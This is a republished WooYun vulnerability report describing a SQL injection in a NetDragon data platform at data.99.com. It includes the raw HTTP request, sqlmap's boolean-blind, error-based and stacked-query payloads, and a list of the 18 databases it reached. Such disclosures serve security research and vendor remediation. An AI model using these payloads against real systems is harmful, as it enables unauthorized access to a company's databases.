福建网龙某数据平台MSSQL注入

admin 2017年4月18日13:40:52评论252 views字数 205阅读0分41秒阅读模式
摘要

2016-02-28: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经确认,细节仅向厂商公开
2016-03-10: 细节向核心白帽子及相关领域专家公开
2016-03-20: 细节向普通白帽子公开
2016-03-30: 细节向实习白帽子公开
2016-04-14: 细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2016-179214

漏洞标题: 福建网龙某数据平台MSSQL注入

相关厂商: 福建网龙

漏洞作者: Forever80s

提交时间: 2016-02-28 08:45

公开时间: 2016-04-14 09:41

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏


漏洞详情

披露状态:

2016-02-28: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经确认,细节仅向厂商公开
2016-03-10: 细节向核心白帽子及相关领域专家公开
2016-03-20: 细节向普通白帽子公开
2016-03-30: 细节向实习白帽子公开
2016-04-14: 细节向公众公开

简要描述:

报错型可跨十余个数据库

详细说明:

data.99.com

---------

POST /asmx/ACAjax.asmx/GetMenuListByDemo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5

Origin: http://data.99.com

Referer: http://data.99.com/ACFrame.aspx?id=rootGAM&statu=ul

X-Requested-With: XMLHttpRequest

Cache-Control: no-cache

X-Forwarded-For: 127.0.0.1

Content-Type: application/json;utf-8

Host: data.99.com

Cookie: ASP.NET_SessionId=qwima4nie5mbyi451cmcva55; InjectDfMsg=IP:115.195.139.239|time:2016/2/5 6:03:20|Page:/appcenter/app_accountperfect.aspxtxtAccountID=4916613944329494&txtAccountName=Smith&txtUserName=Smith&txtCompanyName=Smith&txtPhone=3&txtEmail=aaaaa%40example.com&txtQQ=3&txtAddress=3&btnSubmit=%25u63d0%25u4ea4

Content-Length: 21

Accept-Encoding: gzip, deflate

{"SysCode":"rootGAM"}

---------

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: JSON SysCode ((custom) POST)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: {"SysCode":"-7324' OR 8527=8527 AND 'aaYm'='aaYm"}

Vector: OR [INFERENCE]

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: {"SysCode":"rootGAM' AND 5616=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5616=5616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(118)+CHAR(113))) AND 'xGZj'='xGZj"}

Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: {"SysCode":"rootGAM';WAITFOR DELAY '0:0:5'--"}

Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

---------

available databases [18]:

[*] af_blog

[*] Ceqn

[*] ConsumeDatawareHouse

[*] DKClub

[*] master

[*] model

[*] msdb

[*] nd91_dataframe

[*] nd91_dataframe_test

[*] Nd91Webgame_Wan_Log

[*] Nd91Webgame_Web

[*] Nd91Webgame_Web_Log

[*] ND_DataMart

[*] ndsd_frame

[*] ndsd_SubsysData

[*] sdklogdb

[*] tempdb

[*] UserInfoMana

漏洞证明:

修复方案:

整个网站代码重新审计一下

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-02-29 09:41

厂商回复:

感谢Forever80s支持

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin